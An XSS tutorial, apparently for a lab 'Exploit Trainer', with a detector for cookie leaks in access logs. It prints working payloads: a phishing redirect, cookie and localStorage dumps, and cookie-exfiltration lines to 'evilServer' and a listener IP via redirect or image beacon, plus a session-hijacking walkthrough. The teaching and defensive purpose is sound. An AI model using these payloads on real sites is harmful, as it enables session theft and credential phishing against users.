Common XSS 'injections'
So, you have found XSS and made an 'alert()' box pop up. Congratulations. What can we do next?
In this article we will look at some of the common XSS-based attacks:
- Window relocation
- Scraping user information
Info
For the examples, I have linked the scripts directly to the `onclick` attribute of the buttons (otherwise they would trigger automatically):
```html
<button onclick="PAYLOAD">
```
Window Relocation
For a phishing-style attack we can redirect the current page elsewhere (for example, to a page that looks much like the login page). This may enable us to seize user credentials.
This would use the payload:
```html
<script>window.location="http://127.0.0.1:8000/"</script>
```
to redirect the user to another page that is under our control.
A common use of this is to create an evil version of the site's login page to harvest user credentials, before redirecting back to the intended content.
You can see an example of this by clicking the button below
Manipulating Browser Behaviour
As the JavaScript has access to almost anything in the browser's current session, it is also possible to start grabbing data from, or manipulating the behaviour of, the browser itself.
For example, we can use the following to show the user's current set of cookies:
```html
<script>alert(document.cookie)</script>
```
Or use a payload like this to grab an element of HTML local storage:
```html
<script>alert(localStorage.key(0) + " " + localStorage.getItem(localStorage.key(0)))</script>
```
Redirected Session Jacking
Putting these elements (redirection and leaking browser information) together gives us another payload.
Rather than use an `alert()` as a payload, we can use XSS to grab another user's session details, then redirect to a target page that gathers those details.
This relies on using the JavaScript to make a request to another site (one that we own) and appending the session cookie.
Our basic POC (proof-of-concept exploit) would make use of the following:
```html
<script>window.location="http://evilServer/?cookie="+document.cookie</script>
```
In this case we also need a server available to listen for the connection. For testing I like to use a locally hosted server, for example the one built into Python:
```sh
# For Python 2
python -m SimpleHTTPServer
# For Python 3
python -m http.server
```
This means our payload becomes:
```html
<script>window.location="http://127.0.0.1:8000/evil.php?cookie="+document.cookie</script>
```
Note
Remember to use the port your server is listening on.
```console
kali@kali:~$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
127.0.0.1 - - [01/Nov/2020 16:08:42] code 404, message File not found
127.0.0.1 - - [01/Nov/2020 16:08:42] "GET /cookie.php?_ga=GA1.1.1899681705.1601546157;%20_hjid=304c63fa-2fd3-4940-9803-d380302c7b07 HTTP/1.1" 404 -
127.0.0.1 - - [01/Nov/2020 16:08:42] code 404, message File not found
127.0.0.1 - - [01/Nov/2020 16:08:42] "GET /favicon.ico HTTP/1.1" 404 -
```
We can pick out the PHPSESSID cookie, and hijack someone else's session by changing the cookie settings in our browser.
More Subtle session jacking
While a redirect gets us the information we want, having your victim's browser hang, or show them a 404, is not very subtle.
Instead we could take a couple of alternative approaches:
- Have the web server show an "error" page. When the user hits the back button (or, if we are really cunning, hits a link we supply built from the `Referer` part of the request) they go back to the main page, hopefully oblivious.
- Get the JS to request the page as part of another object (i.e. an image). This will then be rendered invisibly (or at worst as an error in the console) on the original page.
One approach to this is to use an image (or similar) as the payload:
```js
new Image().src="http://192.168.3.1:8000/evil.php?output="+document.cookie;
```
Our listener will then pick up the cookie, and we can again steal their session.
You can try this out by starting a Python web server and clicking the button below.
Important
Check my script to be sure the address is local. It is always a good idea to check the source when someone offers to show you a "cool hacking trick".
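Whichever of the two payloads above is used (redirect or image beacon), the leaked cookie jar ends up as a query string in an access log of the shape shown earlier, which is what a defender going through web-server or forward-proxy logs can look for. The detector below is an added example, not part of the original page: it assumes `http.server` / common-log-format request lines, and the `SESSION_COOKIE_NAMES` set and the sample log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, unquote

# Request line inside a Python http.server / common-log-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Cookie names that indicate a session leak even when they arrive on their own.
SESSION_COOKIE_NAMES = {"PHPSESSID", "JSESSIONID", "ASP.NET_SessionId", "connect.sid"}

def _cookie_names(text):
    """Names of the 'name=value' pairs in a document.cookie-shaped string."""
    names = []
    for pair in text.split(";"):
        name, sep, _ = pair.strip().partition("=")
        if sep and name and " " not in name:
            names.append(name)
    return names

def _looks_like_cookie_dump(names):
    # document.cookie yields several pairs; a lone known session cookie is enough too.
    return len(names) >= 2 or any(n in SESSION_COOKIE_NAMES for n in names)

def find_cookie_leaks(log_lines):
    """Flag requests whose query string carries a serialised document.cookie.
    The raw query (payloads that append document.cookie directly) and each
    parameter value (?cookie=... or ?output=...) are both inspected."""
    findings = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        candidates = [("<query>", unquote(url.query))]
        for part in url.query.split("&"):
            param, _, value = part.partition("=")
            candidates.append((unquote(param), unquote(value)))
        for where, text in candidates:
            names = _cookie_names(text)
            if _looks_like_cookie_dump(names):
                findings.append({"path": url.path, "where": where, "cookies": names})
                break  # one finding per request is enough
    return findings

# Constructed sample modelled on the http.server output above; the PHPSESSID value
# is a placeholder, not a real session id.
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Nov/2020 16:08:42] "GET /cookie.php?_ga=GA1.1.1899681705.1601546157;%20_hjid=304c63fa-2fd3-4940-9803-d380302c7b07 HTTP/1.1" 404 -',
    '127.0.0.1 - - [01/Nov/2020 16:08:42] "GET /favicon.ico HTTP/1.1" 404 -',
    '127.0.0.1 - - [01/Nov/2020 16:09:10] "GET /evil.php?output=PHPSESSID=PLACEHOLDER HTTP/1.1" 404 -',
    '127.0.0.1 - - [01/Nov/2020 16:09:30] "GET /search?q=xss%20tutorial&page=2 HTTP/1.1" 200 -',
]
```

Running `find_cookie_leaks(SAMPLE_LOG)` flags the first and third requests and leaves the favicon and search requests alone; marking session cookies `HttpOnly` stops `document.cookie` from exposing them in the first place.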
Task
In the Exploit Trainer, try the Reflected XSS examples. See if you can send using XSS.
Alternatives to script tags
There are several options rather than using `<script>` tags. These use similar payloads to the scripting version. Useful ones include:
What | Payload |
---|---|
onload (fires when the page loads) | `<body onload="alert()">` |
Mouse events | `<tag onmouseover="alert()">...</tag>` |
Errors | `<img src="url-that-does-not-exist" onerror="alert()">` |
Task
Try getting an XSS payload to fire. See if you can grab a session token using the web trainer. Also try some of the more interesting XSS scripts below.
Further reading
For an excellent (and somewhat scary) resource on payloads see
For information on XSS in other templating languages (not just PHP)